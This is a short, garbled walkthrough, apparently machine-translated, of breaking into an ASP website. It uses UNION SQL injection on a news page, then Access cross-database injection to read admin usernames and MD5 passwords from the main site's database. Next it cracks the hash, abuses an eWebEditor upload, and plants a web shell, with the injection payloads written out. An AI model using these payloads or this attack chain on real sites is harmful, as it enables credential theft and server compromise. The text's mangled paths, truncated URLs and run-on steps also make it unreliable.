Access injection cross-Database Query

The target step is as follows: http://www.abc.com/news/type.asp? Typeid = 4UNION field number is 6, foreground display field is 3 http://www.abc.com/news/type.asp? Typ... on select 1, 2, admin, 4, 5, 6 from admin injection point: Only one field admin can be obtained, which is of little use and has nothing to do with the main site, do not share a database http://www.abc.com/aspcheck.aspprobe, show webroot directory as c:ootfound http://www.abc.com/Main Site program for a whole site management system published on the internet found modified eWebEditor, path to edit/eWebEditor. asp detects the cookie spoofing vulnerability. The local machine passes the test and fails to cheat the host for unknown reasons. In this step, the website database uses the default data/# db1.asp database for anti-download, the Administrator table is admin and the fields are user. pass summarizes the above information and concludes that the absolute path of the master site database is C: ootdata # the program in the db1.aspnews folder has nothing to do with the main site program. solution 2: Access Cross-database injection http: // www. Abc.com/news/type.asp? Typ... on select 1, 2, user, 4, 5, 6 from [C: ootdata \ % 23db1. asp]. adminhttp: // www.abc.com/news/type.asp? Typ... on select 1, 2, pass, 4, 5, 6 from [C: ootdata \ % 23db1. asp]. admin obtains the user and MD5 password, and logs on to www.20.5.com to successfully crack the password in eWebEditor. asp after adding an id parameter can upload GIF | JPG | BMP file http://www.abc.com/edit/eWebEditor.asp? Id = 1 upload a shellhttp: // www.abc.com/admin_index.asp;after using the shellhttp: // www.abc.com/admin_index.asp;function with the suffix of eWebEditor, and then use the data warehouse function to get to a shell technology .......